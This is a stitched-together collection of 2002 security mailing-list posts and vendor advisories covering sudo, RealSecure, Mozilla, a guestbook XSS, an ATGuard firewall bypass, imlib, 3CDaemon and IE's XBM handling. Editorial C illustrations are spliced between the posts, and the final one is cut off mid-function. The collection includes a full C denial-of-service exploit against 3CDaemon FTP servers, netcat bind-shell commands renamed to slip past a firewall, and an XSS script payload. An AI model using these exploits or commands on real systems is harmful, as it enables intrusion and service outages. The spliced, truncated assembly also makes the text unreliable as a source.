                                SuSE Linux Connectivity Server
        Vulnerability Type:     local privilege escalation
        Severity (1-10):        6
        SuSE default package:   yes
        Other affected systems: All systems with sudo installed.

    Content of this advisory:
        1) security vulnerability resolved: Heap overflow in sudo.
           problem description, discussion, solution and upgrade information
        2) pending vulnerabilities, solutions, workarounds
        3) standard appendix (further information)

1) problem description, brief discussion, solution, upgrade information

    The sudo program allows local users to execute certain configured commands with root privileges. Sudo contains a heap overflow in its prompt assembling function. The input used to create the password prompt is user controlled and not properly length-checked before being copied to certain heap locations. This allows local attackers to overflow the heap of sudo, thus executing arbitrary commands as root.

    We would like to thank GlobalInterSec for finding and researching this vulnerability.

    As a temporary workaround you may remove the setuid bit from sudo by issuing the following command as root:

        chmod -s /usr/bin/sudo

    Please download the update package for your distribution and verify its integrity by the methods listed in section 3) of this announcement. Then, install the package using the command "rpm -Fhv file.rpm" to apply the update. Our maintenance customers are being notified individually. The packages are being offered to install from the maintenance web.
i386 Intel Platform:

SuSE-8.0
ftp://ftp.suse.com/pub/suse/i386/update/8.0/ap1/sudo-1.6.5p2-79.i386.rpm
b54f68ff4b32f9d920f2f1ff887d1ddc
source rpm:
ftp://ftp.suse.com/pub/suse/i386/update/8.0/zq1/sudo-1.6.5p2-79.src.rpm
fd1ccf6fe52c6b999c5ed24a2f3a4e65

SuSE-7.3
ftp://ftp.suse.com/pub/suse/i386/update/7.3/ap1/sudo-1.6.3p7-83.i386.rpm
80edbf5caf02c519cf2c01d6ba76d22f
source rpm:
ftp://ftp.suse.com/pub/suse/i386/update/7.3/zq1/sudo-1.6.3p7-83.src.rpm
77962932840740ce5e3dfe57a887592d

SuSE-7.2
ftp://ftp.suse.com/pub/suse/i386/update/7.2/ap1/sudo-1.6.3p6-92.i386.rpm
669aa8db134e39f462cb9f2648f6735f
source rpm:
ftp://ftp.suse.com/pub/suse/i386/update/7.2/zq1/sudo-1.6.3p6-92.src.rpm
249b1ef0135dcfede3648982900e277c

SuSE-7.1
ftp://ftp.suse.com/pub/suse/i386/update/7.1/ap1/sudo-1.6.3p6-91.i386.rpm
6b3b84f0a4c687e91da179937b87048a
source rpm:
ftp://ftp.suse.com/pub/suse/i386/update/7.1/zq1/sudo-1.6.3p6-91.src.rpm
bf59a6b200a0fb130f3528ce23698be0

SuSE-7.0
ftp://ftp.suse.com/pub/suse/i386/update/7.0/ap1/sudo-1.6.3p6-90.i386.rpm
5b67ef9fed383242111953d942c62174
source rpm:
ftp://ftp.suse.com/pub/suse/i386/update/7.0/zq1/sudo-1.6.3p6-90.src.rpm
c35f6390b360500b7b649e4590a748cc

SuSE-6.4
ftp://ftp.suse.com/pub/suse/i386/update/6.4/ap1/sudo-1.5.9p1-87.i386.rpm
82d98116eccc73c7a0ce03a51e9b5378
source rpm:
ftp://ftp.suse.com/pub/suse/i386/update/6.4/zq1/sudo-1.5.9p1-87.src.rpm
e75e2608036a963a7339fe4632a2550b

Sparc Platform:

SuSE-7.3
ftp://ftp.suse.com/pub/suse/sparc/update/7.3/ap1/sudo-1.6.3p7-33.sparc.rpm
bd492b6d601ceb30486e3e970a2211a3
source rpm:
ftp://ftp.suse.com/pub/suse/sparc/update/7.3/zq1/sudo-1.6.3p7-33.src.rpm
d2435d180cdd76647e1f1416e93c2420

SuSE-7.1
ftp://ftp.suse.com/pub/suse/sparc/update/7.1/ap1/sudo-1.6.3p6-37.sparc.rpm
bbad36265f93fac25d59f8c26b1ccd52
source rpm:
ftp://ftp.suse.com/pub/suse/sparc/update/7.1/zq1/sudo-1.6.3p6-37.src.rpm
a328d2eb0fdc816341a68febfeb5a33a

SuSE-7.0
ftp://ftp.suse.com/pub/suse/sparc/update/7.0/ap1/sudo-1.6.3p6-36.sparc.rpm
48e7b360b45bae0b3e9e90b3bf945f75
source rpm:
ftp://ftp.suse.com/pub/suse/sparc/update/7.0/zq1/sudo-1.6.3p6-36.src.rpm
bd8f11a8916340e0d243ae1cc647df26

AXP Alpha Platform:

SuSE-7.1
ftp://ftp.suse.com/pub/suse/axp/update/7.1/ap1/sudo-1.6.3p6-40.alpha.rpm
4505dd58fe309ef0a4515db6a6980ec4
source rpm:
ftp://ftp.suse.com/pub/suse/axp/update/7.1/zq1/sudo-1.6.3p6-40.src.rpm
85dfbe40da4d93d54d3c16f6489a7f32
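The defect class the SuSE text describes, a prompt assembled from user-controlled input into a heap buffer whose size was not derived from the expanded text, can be shown next to the corrected pattern. The C below is an added illustration written for this page; it is not sudo's source, and the template syntax (%u for the user name, %h for the host name) and all function names are assumptions made here.

```c
#include <stdlib.h>
#include <string.h>

/* Added illustration, not sudo's code. A prompt template supplied by the
 * user is expanded: "%u" becomes the user name and "%h" the host name
 * (hypothetical template syntax chosen for this example). */

/* Length of the template after expansion, measured before any copy. */
size_t prompt_expanded_len(const char *tmpl, const char *user, const char *host)
{
    size_t n = 0;
    for (const char *p = tmpl; *p; p++) {
        if (p[0] == '%' && p[1] == 'u') { n += strlen(user); p++; }
        else if (p[0] == '%' && p[1] == 'h') { n += strlen(host); p++; }
        else n++;
    }
    return n;
}

/* Shared expansion loop; writes into a buffer the caller has sized. */
static void expand_into(char *out, const char *tmpl, const char *user, const char *host)
{
    char *q = out;
    for (const char *p = tmpl; *p; p++) {
        if (p[0] == '%' && p[1] == 'u') { size_t l = strlen(user); memcpy(q, user, l); q += l; p++; }
        else if (p[0] == '%' && p[1] == 'h') { size_t l = strlen(host); memcpy(q, host, l); q += l; p++; }
        else *q++ = *p;
    }
    *q = '\0';
}

/* DEFECTIVE pattern, shown for contrast and never called here: the heap
 * buffer is sized from the template, not from the expanded text, so every
 * "%u" or "%h" whose replacement is longer than two bytes writes past the
 * allocation. This is the shape of bug the advisory describes. */
char *expand_prompt_unchecked(const char *tmpl, const char *user, const char *host)
{
    char *out = malloc(strlen(tmpl) + 1);   /* too small once %u/%h expand */
    if (out) expand_into(out, tmpl, user, host);
    return out;
}

/* Corrected pattern: measure first, allocate exactly, then copy. */
char *expand_prompt(const char *tmpl, const char *user, const char *host)
{
    size_t need = prompt_expanded_len(tmpl, user, host);
    char *out = malloc(need + 1);
    if (out) expand_into(out, tmpl, user, host);
    return out;
}

/* Bytes the unchecked variant would write beyond its allocation; 0 if none. */
size_t prompt_overrun(const char *tmpl, const char *user, const char *host)
{
    size_t need = prompt_expanded_len(tmpl, user, host) + 1;
    size_t got = strlen(tmpl) + 1;
    return need > got ? need - got : 0;
}

/* Check helper: 1 if the corrected expansion of tmpl equals expected. */
int prompt_equals(const char *tmpl, const char *user, const char *host, const char *expected)
{
    char *p = expand_prompt(tmpl, user, host);
    int ok = p != NULL && strcmp(p, expected) == 0;
    free(p);
    return ok;
}
```

The point of the two-pass structure is that the allocation size and the bytes written come from the same measurement, so a long user name, host name or template cannot make them disagree; prompt_overrun() quantifies how far the template-sized variant would have written past its block for a given input.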
ISS Advisory: Remote Denial of Service Vulnerability in RealSecure Network Sensor
-----BEGIN PGP SIGNED MESSAGE-----

Internet Security Systems Security Advisory
April 30, 2002

Remote Denial of Service Vulnerability in RealSecure Network Sensor

Synopsis:

ISS X-Force has learned of a denial of service (DoS) vulnerability that affects Internet Security Systems RealSecure Network Sensor. This vulnerability may allow remote attackers to crash RealSecure by sending specially crafted packets to network segments monitored by RealSecure. RealSecure X-Press Update 4.3 contains a fix for the DHCP vulnerability and is available for immediate download on the ISS download center.

Affected Versions:

RealSecure Network Sensor 5.x, XPU 3.4 and later
RealSecure Network Sensor 6.0, XPU 3.4 and later
RealSecure Network Sensor 6.5

Description:

RealSecure Network Sensor has three informational signatures associated with DHCP (Dynamic Host Configuration Protocol): DHCP_ACK (7131), DHCP_Discover (7132), and DHCP_Request (7133). These signatures contain a flaw that will result in an illegal attempt to de-reference a null memory pointer when RealSecure detects certain types of DHCP traffic. This action may generate an exception error or a segmentation fault which can cause the RealSecure sensor to crash.

This vulnerability was introduced in RealSecure Network Sensor 6.5. XPU 3.4 delivered the vulnerable DHCP signatures to older RealSecure product lines including 6.0 and 5.x. It may be possible for remote attackers to create specially-crafted DHCP traffic to cause the sensor to malfunction or crash entirely.

The three DHCP signatures were disabled by default in Network Sensor 5.x and 6.0. The signatures were enabled by default in Network Sensor 6.5 within the Maximum policy. However, if these signatures are not enabled, RealSecure Network Sensor is not vulnerable to these attacks.

Recommendations:

X-Force recommends that all RealSecure customers tune their policies to their environments. RealSecure X-Press Update 4.3 contains a fix for the DHCP vulnerability.

X-Press Update 4.3 is available for download on the ISS download center:
http://www.iss.net/download/

DHCP traffic is commonly blocked at perimeter firewalls. Network administrators are advised to assess their network perimeter defenses routinely. Exploitation of this vulnerability is blocked by proper filtering of DHCP traffic on UDP port 67.

About Internet Security Systems (ISS)

Founded in 1994, Internet Security Systems (ISS) (Nasdaq: ISSX) is a pioneer and world leader in software and services that protect critical online resources from an ever-changing spectrum of threats and misuse. Internet Security Systems is headquartered in Atlanta, GA, with additional operations throughout the Americas, Asia, Australia, Europe and the Middle East.

Copyright (c) 2002 Internet Security Systems, Inc. All rights reserved worldwide.

Permission is hereby granted for the electronic redistribution of this document. It is not to be edited or altered in any way without the express written consent of the Internet Security Systems X-Force. If you wish to reprint the whole or any part of this document in any other medium excluding electronic media, please email [EMAIL PROTECTED] for permission.

Disclaimer: The information within this paper may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties, implied or otherwise, with regard to this information or its use. Any use of this information is at the user's risk. In no event shall the author/distributor (Internet Security Systems X-Force) be held liable for any damages whatsoever arising out of or in connection with the use or spread of this information.

X-Force PGP Key available on MIT's PGP key server and PGP.com's key server, as well as at http://www.iss.net/security_center/sensitive.php

Please send suggestions, updates, and comments to: X-Force

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBPM7pJjRfJiV99eG9AQHBBAQAmh7q8UVXJcdNbSpuiSA0oyVSgLhqc1O2
bQyGOeNbbWhTLWQ3pMzcBjx4vjTE34dI4T4OT7PLlGVuvcW4fLG70Lq+Fsr34gQj
E17UWKvqvD+AUXvcMq0gxjV15uykkmhy01zZ+Cwn5LsjWXjzpy4r/a7OzZ13Lzrq
u7+bVixmr70=
=m3XN
-----END PGP SIGNATURE-----
RE: Reading local files in Netscape 6 and Mozilla (GM#001-NS)
> Demonstration:
> A fully dynamic proof-of-concept demonstration of this issue is available at http://security.greymagic.com/adv/gm001-ns/.

As some of you may have noticed, the above proof-of-concept does not work in Mozilla 1.0 Release Candidate 1. Don't get your hopes high about this though, the issue has not been fixed in moz1rc1 - the XMLHttpRequest was simply broken in this version of the browser for unknown reasons, a fact not mentioned in the release notes. When trying to use it, either nothing happens or the browser crashes.

The proof-of-concept works just fine in Mozilla 0.9.9 (and NS6.1+), and would work fine in moz1rc1 if the XMLHttpRequest object could be used at all.

The Mozilla XML-Extras project also includes a document.load method that is used to load XML documents. The same issue applies to this method, and a proof-of-concept demonstration that also works in moz1rc1 can be found at http://jscript.dk/2002/4/NS6Tests/documentload.html

Regards
Thor Larholm
Jubii A/S - Internet Programmer
Levcgi.coms MyGuestbook JavaScript Injection Vulnerability
http://rawt.daemon.sh

Levcgi.coms MyGuestbook JavaScript Injection Vulnerability
Discovered By BrainRawt ([EMAIL PROTECTED])

About MyGuestbook:
--
Highly customizable guestbook that was released on Feb. 20, 2002, and can be downloaded at http://www.levcgi.com/programs.cgi?program=myguestbook
According to the website, "...myGuestbook has been downloaded 1298 times!"

Vulnerable (tested) Versions:
MyGuestbook v 1.0

Vendor Contact:
4-28-02 - Emailed [EMAIL PROTECTED]
4-30-02 - No reply from the author, and I have decided not to wait since I never got a reply about another concern I had several months ago involving one of his cgi scripts.

Vulnerability:
myguestbook improperly filters input to the guestbook, making the guestbook prone to cross-site scripting attacks by malicious visitors to the site. This could be a medium to high concern when mixed with a website that uses cookies.

Exploit (POC):
Sign up and post using the name <script>alert('evil+java+script+here')</script>
or
When posting comments just insert the <script>alert('evil+java+script+here')</script> into the comments field.

--
Knowledge is Power! How Powerful are you?
- BrainRawt
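The missing control in the guestbook is output encoding: a visitor's name or comment has to be emitted as HTML text, never as markup. The function below is an added example written for this page, not MyGuestbook's code (which is a CGI script; the C here is only to show the transformation and the check), and its names are assumptions.

```c
#include <stdlib.h>
#include <string.h>

/* Added illustration for this page, not MyGuestbook's code. Escapes the five
 * characters that matter inside HTML text and quoted attribute values, so a
 * stored name or comment renders as text instead of being parsed as a tag. */
char *html_escape(const char *in)
{
    size_t need = 0;
    for (const char *p = in; *p; p++) {
        switch (*p) {
        case '<': case '>': need += 4; break;   /* &lt; &gt;  */
        case '&':           need += 5; break;   /* &amp;      */
        case '"':           need += 6; break;   /* &quot;     */
        case '\'':          need += 5; break;   /* &#39;      */
        default:            need += 1; break;
        }
    }
    char *out = malloc(need + 1);
    if (!out) return NULL;
    char *q = out;
    for (const char *p = in; *p; p++) {
        const char *rep = NULL;
        switch (*p) {
        case '<':  rep = "&lt;";   break;
        case '>':  rep = "&gt;";   break;
        case '&':  rep = "&amp;";  break;
        case '"':  rep = "&quot;"; break;
        case '\'': rep = "&#39;";  break;
        }
        if (rep) { size_t l = strlen(rep); memcpy(q, rep, l); q += l; }
        else *q++ = *p;
    }
    *q = '\0';
    return out;
}

/* Check helper: 1 if escaping `in` yields exactly `expected`. */
int html_escape_equals(const char *in, const char *expected)
{
    char *e = html_escape(in);
    int ok = e != NULL && strcmp(e, expected) == 0;
    free(e);
    return ok;
}

/* Check helper: 1 if the escaped form contains no raw '<', '>' or '"',
 * i.e. it can neither open a tag nor close a quoted attribute. */
int html_escape_is_inert(const char *in)
{
    char *e = html_escape(in);
    int ok = e != NULL && strpbrk(e, "<>\"") == NULL;
    free(e);
    return ok;
}
```

Escaping belongs at the point where the stored value is written into the page, not at submission time, so that the same stored text is safe in every template that later displays it.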
Re: ITCP Advisory 13: Bypassing of ATGuard Firewall possible
As far as I see, the article you gave me at tooleaky.zensoft.com mostly deals with outbound connections. The ATGuard problem still goes further; it is also a problem with inbound connections.

I use a Xitami Webserver on Port 50080 for testing purposes. This Xitami Webserver is (currently) allowed to accept all connections on all ports (this is also a configuration problem, but most people just allow inbound connections from any address to any port for an application).

So, I just did the following:

I:\>cd netcat
I:\netcat>nc -e c:\winnt\system32\cmd.exe -p 500 -l

I tried to connect to port 500 with telnet: ATGuard fires up as it is supposed to. So, now I did the following:

I:\netcat>copy nc.exe xiwin32.exe
        1 Datei(en) kopiert.
(Translation for the curious non-German readers: 1 File copied :)

I:\netcat>xiwin32.exe -e c:\winnt\system32\cmd.exe -p 500 -l

Trying it with telnet again, I got a very nice shell without any notice from ATGuard. That's why I also mentioned trojan horses in my advisories - just renaming your trojan horse to the name of a program that is allowed to accept inbound connections will do the trick.

> There is no ultimate way to control all outbound communication. If you use your own low-level drivers, no personal firewall can stop you.

Surely there is no ultimate way. But if you are not aware that a problem exists, you can't think about solutions. Also, you perhaps will think that your personal firewall is perfectly safe while it isn't.

Best regards,
---
BlueScreen / Florian Hobelsberger (UIN: 101782087)
Member of: www.IT-Checkpoint.net www.Hackeinsteiger.de www.DvLdW.de
==
To encrypt classified messages, please download and use this PGP-Key:
http://www.florian-hobelsberger.de/BlueScreen-PGP-PubKey.txt
==
Re: ITCP Advisory 13: Bypassing of ATGuard Firewall possible
Hi,

Ye Olde Disclaimer: The information contained in this email is believed to be true. However, exhaustive regression testing has not been performed. No guarantees or warranties are implicitly or explicitly granted. Use the information within at your own risk.

Tested AtGuard version: 3.21.05
Tested OS's: NT4 SP6a, Win95 (don't hit me, I'm cheap)

BlueScreen wrote:

> - itcp advisory 13
> [EMAIL PROTECTED]
> http://www.it-checkpoint.net/advisory/12.html
> April 29th, 2002
> - ITCP Advisory 13: Bypassing of ATGuard Firewall possible -
> - *snip*
> DETAILS
> *snip*
> Sadly ATGuard doesn't save the file paths / doesn't use checksums (would be much better) to determine whether the executed program is really the one that is allowed to connect to all hosts on port 80. It just uses the filename (in this case IEXPLORE.EXE).

Only if you've created your rule in interactive learning mode. See discussion below.

> *snip*
> SOLUTION
> There doesn't exist a solution, since ATGuard is not developed anymore. We were not able to test the Norton Personal Firewall for this problem, since no one of us owns it. We are contacting Norton directly with this Advisory.

Not quite correct. The bug reported in BlueScreen's advisory does exist. However, either the method of testing was incomplete, or the report was incomplete. Also, there is a workaround.

AtGuard has the ability to create firewall rules on the fly (in its interactive learning mode). When a connection is attempted and AtGuard cannot find a matching rule, in interactive learning mode the user is presented with a window containing four options. Two of those options allow the user to specify whether the connection should be allowed or blocked, this one time only. The other two of those options allow the user to create a rule for particular connections (that may either block or allow the connections). This works on either incoming or outgoing connections.

When a rule is created in interactive learning mode, *only the application executable name* is stored in the rulebase. This is the bug that BlueScreen pointed out. Without a path to the application file in the rulebase, any application with a similar name can make use of the firewall rule (block or allow, as the case may be).

However, AtGuard also allows the user to create their own firewall rules manually. Click on the dashboard or tray icon, and launch the Settings menu item. Click the Add button, create a rule, and make sure you specify an application that the rule applies to (on the Application tab, click Application Shown Above, click the Browse button, and specify the proper application with the File Dialog box). You will find the full path to the file specified in the rule. Shut down your machine, and start it up again, and you'll find the full path still there. You can verify the full path in the registry under the key:

HKEY_LOCAL_MACHINE\SOFTWARE\WRQ\IAM\FirewallObjects\Applications

Workaround: Manually create firewall rules instead of using interactive learning mode to create rules. If you do use interactive learning mode, you should reopen the Settings menu, and manually adjust the Application Shown Above so it shows the full path to the application that the rule applies to (you apparently don't have to trash all your current rules). This *appears* to resolve the issue (from my brief testing, YMMV).

Of course, this still wouldn't prevent someone from replacing the specified file with malware. However, if your machine has been compromised to that level, it seems to me you've got more to worry about than a few firewall rules :/

It should be noted that AtGuard rules may be created that allow or block access to *all* applications. Such rules appear to not be affected by this bug.

> ADDITIONAL INFORMATION
> Vendor has not been contacted. (since he doesn't exist anymore).

Actually, the original vendor does exist: http://www.wrq.com. They simply don't sell the product any more. From what I can tell, the original firewall has been sufficiently morphed by Symantec so that it no longer has much resemblance to AtGuard. Thus, I don't think comparisons between products from these two vendors are fair or valid.

-UMus B. KidN
AW: ITCP Advisory 13: Bypassing of ATGuard Firewall possible
Most products use checksums to detect replaced or modified applications. But there are other problems with outbound filters. Most personal firewalls do not detect if a malicious program uses a 'trusted' application to transmit data (look at tooleaky.zensoft.com). I have tested several products with a method similar to Bob Sundling's and only BlackICE PC Protection 3.5 stopped communication (Norton PF, Tiny PF and ZoneAlarm did not stop it). There is no ultimate way to control all outbound communication. If you use your own low-level drivers, no personal firewall can stop you. Jonas
Re: ITCP Advisory 13: Bypassing of ATGuard Firewall possible
BlueScreen in 014401c1ef8d$1bb66510$0100a8c0@BlueScreenPrimary:

> ATGuard can be fooled to think that a disallowed program is allowed to connect to the internet.

This is a well known problem and has been discussed at length on http://grc.com/lt/scoreboard.htm. A.M Janssen has written a utility which monitors the hashes (SHA1, RIPEMD-160 or Haval) for the applications in AtGuard's ruleset: http://www.capimonitor.nl/nisfilecheck11.zip. It has to be separately scheduled, so it's not as good as real-time checks by the firewall, but very useful nonetheless.
Security Update: [CSSA-2002-019.0] Linux: imlib processes untrusted images
To: [EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED]

                        Caldera International, Inc.  Security Advisory

Subject:                Linux: imlib processes untrusted images
Advisory number:        CSSA-2002-019.0
Issue date:             2002 April 29
Cross reference:

1. Problem Description

   Imlib versions prior to 1.9.13 would fall back to loading images via the NetPBM package. NetPBM has various problems itself that make it unsuitable for loading untrusted images. This may allow attackers to construct images that, when loaded by a viewer using Imlib, could cause crashes or potentially, the execution of arbitrary code.

   In addition, this version (1.9.14) also includes some further fixes from the imlib team.

2. Vulnerable Supported Versions

   System                       Package
   ----------------------------------------------------------------
   OpenLinux 3.1.1 Server       prior to imlib-1.9.14-1.i386.rpm
                                prior to imlib-devel-1.9.14-1.i386.rpm
   OpenLinux 3.1.1 Workstation  prior to imlib-1.9.14-1.i386.rpm
                                prior to imlib-devel-1.9.14-1.i386.rpm
   OpenLinux 3.1 Server         prior to imlib-1.9.14-1.i386.rpm
                                prior to imlib-devel-1.9.14-1.i386.rpm
   OpenLinux 3.1 Workstation    prior to imlib-1.9.14-1.i386.rpm
                                prior to imlib-devel-1.9.14-1.i386.rpm

3. Solution

   The proper solution is to install the latest packages.

4. OpenLinux 3.1.1 Server

   4.1 Package Location
   ftp://ftp.caldera.com/pub/updates/OpenLinux/3.1.1/Server/current/RPMS

   4.2 Packages
   56ed4f4cdf53abc39ba462021496314b  imlib-1.9.14-1.i386.rpm
   743951ea75a12121f6696a57a6a4d091  imlib-devel-1.9.14-1.i386.rpm

   4.3 Installation
   rpm -Fvh imlib-1.9.14-1.i386.rpm
   rpm -Fvh imlib-devel-1.9.14-1.i386.rpm

   4.4 Source Package Location
   ftp://ftp.caldera.com/pub/updates/OpenLinux/3.1.1/Server/current/SRPMS

   4.5 Source Packages
   7f31fe77f6e8086aced4bb412b46e55c  imlib-1.9.14-1.src.rpm

5. OpenLinux 3.1.1 Workstation

   5.1 Package Location
   ftp://ftp.caldera.com/pub/updates/OpenLinux/3.1.1/Workstation/current/RPMS

   5.2 Packages
   de20299b700ab3918bed0c782abcd6c3  imlib-1.9.14-1.i386.rpm
   ba96a381bb7c60f20ce74b5645c02fa8  imlib-devel-1.9.14-1.i386.rpm

   5.3 Installation
   rpm -Fvh imlib-1.9.14-1.i386.rpm
   rpm -Fvh imlib-devel-1.9.14-1.i386.rpm

   5.4 Source Package Location
   ftp://ftp.caldera.com/pub/updates/OpenLinux/3.1.1/Workstation/current/SRPMS

   5.5 Source Packages
   060c0a51023524bb1681ac6b68405bd7  imlib-1.9.14-1.src.rpm

6. OpenLinux 3.1 Server

   6.1 Package Location
   ftp://ftp.caldera.com/pub/updates/OpenLinux/3.1/Server/current/RPMS

   6.2 Packages
   72ab762b5b78035581fa9200cac775d7  imlib-1.9.14-1.i386.rpm
   7e918173391601c5df401be3c7644a78  imlib-devel-1.9.14-1.i386.rpm

   6.3 Installation
   rpm -Fvh imlib-1.9.14-1.i386.rpm
   rpm -Fvh imlib-devel-1.9.14-1.i386.rpm

   6.4 Source Package Location
   ftp://ftp.caldera.com/pub/updates/OpenLinux/3.1/Server/current/SRPMS

   6.5 Source Packages
   4c864ed09fd05a3740e3a8d6acab2349  imlib-1.9.14-1.src.rpm

7. OpenLinux 3.1 Workstation

   7.1 Package Location
   ftp://ftp.caldera.com/pub/updates/OpenLinux/3.1/Workstation/current/RPMS

   7.2 Packages
   0e03563711a6c9902b6d7d2016a45c84  imlib-1.9.14-1.i386.rpm
   d0bbec107ff9b58d8851a0cb680bedf3  imlib-devel-1.9.14-1.i386.rpm

   7.3 Installation
   rpm -Fvh imlib-1.9.14-1.i386.rpm
   rpm -Fvh imlib-devel-1.9.14-1.i386.rpm

   7.4 Source Package Location
   ftp://ftp.caldera.com/pub/updates/OpenLinux/3.1/Workstation/current/SRPMS

   7.5 Source Packages
   5eed6f4ffeeebf13e266a4078bc45442  imlib-1.9.14-1.src.rpm

8. References

   Specific references for this advisory: none

   Caldera OpenLinux security resources:
   http://www.caldera.com/support/security/index.html

   Caldera UNIX security resources:
   http://stage.caldera.com/support/security/

   This security fix closes Caldera incidents sr862212, fz520437, erg712001.

9. Disclaimer

   Caldera International, Inc.
is not responsible for the misuse of any of the information we provide on this website and/or through our security advisories. Our
3CDaemon DoS exploit
3CDaemon 2.0 revision 10 for the Windows platform contains a BOF vulnerability at all times, including the login prompt. When 400+ chars are sent to the FTP server, it crashes immediately. Remote exploit is included. For more details see the exploit as well.

greets,
skyrim - [EMAIL PROTECTED]
MaD SKiLL 'H' - http://www.madskill.tk

/* MaD SKiLL 'H'
 * MsH 4 life! http://www.madskill.tk
 * *Private Release*
 *
 * 3CDaemon 2.0 revision 10 DoS
 *
 * 11:12 14-4-2002: BOF flaw found by skyrim
 * 1:00 15-4-2002: exploit done.
 * 23:31 16-4-2002: Edited the exploit slightly, it's a better code now
 *
 * This program will exploit the buffer overflow vulnerability of
 * 3CDaemon 2.0 FTP servers. Sending 400+ chars will make the server crash
 * at any time they're sent.
 *
 * Tested on:
 * [OS][version]
 * Windows XP (5.1 - 2600) 3CDaemon 2.0 revision 10
 *
 * I don't know if this will work on versions other than the one I tested it on.
 * Have fun.
 *
 * Crew shouts go to: MsH, DFA, uDc
 * Personal shouts to: mannie, primus, amok, torment, talented, warsteam, frodo, maxxo,
 * xo|l, fearless, cybje, kell, frodo, maxxo, and everyone else.
 *
 * skyrim ([EMAIL PROTECTED])
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <strings.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>

#define BOFSIZE 420

void banner(void)
{
    printf("MaD SKiLL 'H' 3CDaemon 2.0 revision 10 DoS\n.:[MsH]:.\n ---\n");
}

void E(char *msg)
{
    perror(msg);
    exit(1);
}

int main(int argc, char *argv[])
{
    static char ownage[BOFSIZE];
    int sockfd, sockfd2, n;
    struct sockaddr_in server_addr;
    struct hostent *server;

    if (argc != 3) {
        fprintf(stderr, "Usage: %s hostname/ip port\n", argv[0]);
        exit(1);
    }

    banner();
    memset(ownage, 'A', BOFSIZE);   /* BOFSIZE bytes of 'A', no terminator: send by size, not strlen() */

    sockfd = socket(AF_INET, SOCK_STREAM, 0);
    if (sockfd < 0)
        E("Error occured during opening socket");

    server = gethostbyname(argv[1]);
    if (server == NULL)
        E("Error occured during host lookup -No such host?-\n");

    bzero((char *) &server_addr, sizeof(server_addr));
    server_addr.sin_family = AF_INET;
    bcopy((char *) server->h_addr, (char *) &server_addr.sin_addr.s_addr, server->h_length);
    server_addr.sin_port = htons(atoi(argv[2]));

    printf("Connecting to target FTP server... ");
    if (connect(sockfd, (struct sockaddr *) &server_addr, sizeof(server_addr)) < 0) {
        E("Error occured during connecting\n");
    }

    printf("Connected, Probing BOF... \n");
    n = write(sockfd, ownage, sizeof(ownage));
    if (n < 0) {
        E("Error occured during writing to socket");
    }
    close(sockfd);

    sockfd2 = socket(AF_INET, SOCK_STREAM, 0);
    printf("Done, checking if server is dead.. \n");
    sleep(5);
    if (connect(sockfd2, (struct sockaddr *) &server_addr, sizeof(server_addr)) < 0) {
        printf("Couldn't establish connection: It seems like it died! =)\n");
        exit(0);
    }
    printf("Server is still alive. Perhaps its not vulnerable?\n");
    return 0;
}
RE: Reading local files in Netscape 6 and Mozilla (GM#001-NS)
Funny, so much rant about not receiving any contact from Netscape (AOL subsidiary) or about not even giving prior notification to the developers about the bug AND, all in all, no one even posts to a bugzilla entry on bugzilla.mozilla.org, which is the best place for bug reports on Mozilla (ie, *not marketdroid webpages*).

This is either ignorance of bugzilla (bad, but I can understand that), or intention to defame the Mozilla developers, which is very bad, since a lot of them dedicate their free time to providing us an extremely standards compliant, Free Software, cross platform web browser, and so we actually owe them a favour (so to speak).

If it is ignorance, I will, then, try to educate:

1. load your favorite browser, and go to http://bugzilla.mozilla.org
2. submit bug
3. if very urgent, go to irc.mozilla.org, /join #mozillazine and SCREAM "SECURITY BUG, can anyone urgently look at *URL*FOR*BUG*ID, please? I can help with details."

In any other case than having first tried to do that, this rant seems absolutely unnecessary.

Regards
--
+ No matter how much you do, you never do enough -- unknown
+ Whatever you do will be insignificant,
| but it is very important that you do it -- Gandhi
+ So let's do it...?
IE/OE6.0 cannot handle malformed XBM files
hello,

Internet Explorer [only 6.0] allows the usage of XBM graphic files and tries to display them whenever they're used in any HTML file [as an IMG tag] or when attached to an e-mail. The XBM structure is very easy: it is a text file with C-like syntax and, for example, looks like:

#define picture_width ??      // picture width
#define picture_height ??     // picture height
static unsigned char picture_bits[] = {
    // hex picture data
};

IE doesn't properly check the content of XBM files, and you may force the browser/e-mail client to hang, which will end up in their silent exit because of the Access Violation exception [as shown with a great help of windbg, it is generated inside mshtml.dll]. IE doesn't check the width and height of the image, so you may write whatever you want and IE will try to interpret it, trying to allocate enough memory for an oversized buffer. When previewed e.g. in Outlook Express, a malformed e-mail may force this client to exit (and others that rely on IE). For an example of such a malformed e-mail, download one from my homepage and try to open it by clicking it in Windows Explorer.

http://www.sztolnia.pl/hack/xbmbug/xbmbug.eml

Don't forget to run OE first :)

Adam Baszczyk
[02-01-11] [en/pl] Home page/Domowa http://www.mykakee.com
[02-01-31] [pl] Pirotechnika http://pyro.pieklo.org
[02-04-27] [pl] Sztolnia kodera, FAQ p.c.p. http://www.sztolnia.pl
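The check the post says IE 6.0 omits is validating the declared width and height before sizing a buffer from them. The parser below is an added example written for this page, not IE's or the author's code; it reads the two #define lines of an XBM header, rejects missing, zero, negative, non-numeric or oversized dimensions, and only then computes the bitmap size. XBM_MAX_DIM and the function names are assumptions made here.

```c
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Added illustration for this page, not IE's code. Hypothetical policy cap
 * on either dimension; with it in place (w+7)/8*h cannot overflow size_t. */
#define XBM_MAX_DIM 16384UL

/* Parse one non-negative decimal token; 0 on success, -1 on anything else. */
static int parse_dim(const char *tok, unsigned long *out)
{
    char *end;
    if (*tok == '-' || *tok == '+' || *tok == '\0') return -1;
    errno = 0;
    unsigned long v = strtoul(tok, &end, 10);
    if (errno == ERANGE || *end != '\0') return -1;
    *out = v;
    return 0;
}

/* Returns 0 and fills width/height/nbytes if the header is acceptable,
 * -1 if a dimension is missing, zero, negative, non-numeric or above the
 * cap. nbytes is the size of the packed 1-bit-per-pixel bitmap with rows
 * padded to whole bytes, as the XBM format lays it out. */
int xbm_parse_header(const char *text, unsigned long *width,
                     unsigned long *height, size_t *nbytes)
{
    unsigned long w = 0, h = 0;
    int have_w = 0, have_h = 0;
    const char *line = text;

    while (*line) {
        const char *nl = strchr(line, '\n');
        size_t len = nl ? (size_t)(nl - line) : strlen(line);
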